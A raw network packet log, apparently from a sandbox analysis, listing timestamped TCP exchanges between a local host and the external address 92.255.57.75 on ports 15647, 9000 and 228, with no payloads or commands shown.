Dec 17, 2024 08:40:36.939738989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.939904928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.958848953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.971726894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.972484112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.989943027 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.992125988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.996061087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.003077030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.003922939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.010776997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.011876106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.030241966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.034854889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.035914898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.042815924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.042867899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.043108940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.053103924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.055946112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.075701952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.075835943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.075882912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.080230951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.083949089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.095098019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.095336914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.095514059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.097439051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.099879980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.105648994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.107976913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.109704971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.109896898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.123919010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.127875090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.131987095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.135916948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.150038958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.151875019 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.162785053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.163913012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.164021015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.167856932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.187840939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.195653915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.195873022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.212615967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.214021921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.219680071 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.219865084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.226636887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.226701021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.226849079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.229665995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.231842995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.246385098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.246546984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.255749941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.255883932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.273147106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.273252010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.273308039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.273511887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.276370049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.276453018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.276521921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.285692930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.285856009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.307626963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.307830095 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.312598944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.312658072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.312702894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.313272953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.316575050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.316636086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.326576948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.326786995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.333957911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.334116936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.342428923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.342518091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.354440928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.354671001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.369726896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.369836092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.379610062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.379698992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.379770994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.393217087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.395874023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.395970106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.398570061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.398718119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.398859978 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.429598093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.429671049 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.433423996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.433490992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.433592081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.435082912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.435214043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.442012072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.442028046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.442076921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.455643892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.455712080 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.465672016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.465760946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.473633051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.473650932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.473701954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.479805946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.480148077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.499542952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.499633074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.499802113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.500164032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.511003017 CET	9000	50061	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.511076927 CET	9000	50061	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.511141062 CET	50061	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.511168957 CET	50061	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.526067019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.526166916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.526168108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.551379919 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.553352118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.553453922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.558506012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.558537006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.558583021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.575726032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.575859070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.582835913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.582901955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.582911968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.590512037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.590589046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.598679066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.598736048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.608330011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.608386993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.608439922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.619971037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.620145082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.620321035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.623821974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.628191948 CET	50063	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.631304026 CET	9000	50061	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.633342981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.633460045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.633549929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.654799938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.654898882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.657367945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.657514095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.657614946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.665559053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.665955067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.671292067 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.671381950 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.678409100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.678503990 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.702759981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.702841043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.703327894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.703373909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.703377008 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.703416109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.715431929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.715506077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.715536118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.728199005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.728327990 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.741797924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.741940975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.748682976 CET	9000	50063	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.748825073 CET	50063	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.748939991 CET	50063	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.753678083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.753694057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.753743887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.753779888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.755330086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.769347906 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.774718046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.774858952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.785732031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.785876989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.786070108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.787039995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.798268080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.798358917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.819001913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.819108963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.819258928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.823411942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.823502064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.826554060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.826642990 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.838814020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.838910103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.858500957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.861741066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.861829042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.868547916 CET	9000	50063	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.877789974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.889183998 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.894970894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.895111084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.895421982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.895495892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.903366089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.903454065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.907819986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.908226013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.933860064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.935910940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.936660051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.943252087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.943375111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.945501089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.945605040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.945678949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.958945036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.959018946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.978557110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.978666067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.995486975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.997534037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.999325991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:37.999420881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:37.999449015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.015260935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.015510082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.015559912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.027781010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.027944088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.050021887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.053704023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.053775072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.058188915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.058250904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.059015989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.059081078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.059144020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.059190989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.065372944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.065454960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.086807013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.087043047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.094429970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.094444036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.094535112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.118665934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.119582891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.119705915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.137304068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.139489889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.139863014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.151393890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.151513100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.170268059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.170357943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.178872108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.178950071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.179357052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.179408073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.179780006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.179792881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.179855108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.184482098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.184550047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.207787991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.207964897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.215404034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.215508938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.220135927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.220194101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.243663073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.246166945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.246180058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.246274948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.257297993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.257405043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.267189980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.267203093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.267357111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.288696051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.291552067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.291640997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.296257973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.296478033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.296525955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.301014900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.301107883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.310969114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.311045885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.335370064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.335437059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.340898991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.340910912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.340991020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.342261076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.342274904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.342426062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.342426062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.365809917 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.365921974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.370934010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.370997906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.377655983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.377666950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.377834082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.399941921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.399980068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.400232077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.408823967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.408910990 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.416100025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.416116953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.416202068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.420828104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.420892954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.433058023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.434132099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.437320948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.437336922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.437403917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.459216118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.459311008 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.463537931 CET	15647	50034	92.255.57.75	192.168.2.11
